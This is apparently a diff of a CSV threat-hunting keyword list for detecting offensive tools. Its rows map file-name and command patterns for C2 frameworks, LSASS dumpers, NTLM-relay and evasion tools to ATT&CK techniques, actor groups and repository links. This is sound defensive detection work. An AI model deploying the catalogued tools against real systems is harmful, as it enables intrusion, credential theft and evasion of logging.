By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*supershell*winpty-agent.exe*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*surajpkhetani/AutoSmuggle*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*suspended_run *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*suspendresume.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*suspendresume.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*suspendresume.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*suspendresume.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*svc_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SW2_GetSyscallNumber*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_GetSyscallNumber*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" 
@@ -17465,33 +17648,33 @@ "*SW3_GetSyscallAddress*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*swaks --to * --from * --header *Subject: * --body * --server *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*SwampThing.exe*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"*SwampThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*SwampThing.pdb*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*SwampThing.sln*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). 
Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.pdb*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.sln*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SWbemServicesImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
-"*sweetpotato -p*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*sweetpotato -p*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*SweetPotato.cna*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z"
 "*SweetPotato.csproj*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z"
 "*SweetPotato.exe*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z"
-"*SweetPotato.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SweetPotato.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
 "*SweetPotato.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*SweetPotato.ImpersonationToken*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z"
 "*SweetPotato.sln*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z"
 "*SweetPotato-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
-"*sweetsoftware/Ares*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z"
+"*sweetsoftware/Ares*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z"
 "*swisskyrepo/SharpLAPS*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z"
 "*swisskyrepo/SSRFmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*SwitchPriv.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
 "*SxNade/Rudrastra*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z"
-"*synacktiv/GPOddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
-"*synacktiv/ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
-"*synacktiv_gpoddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
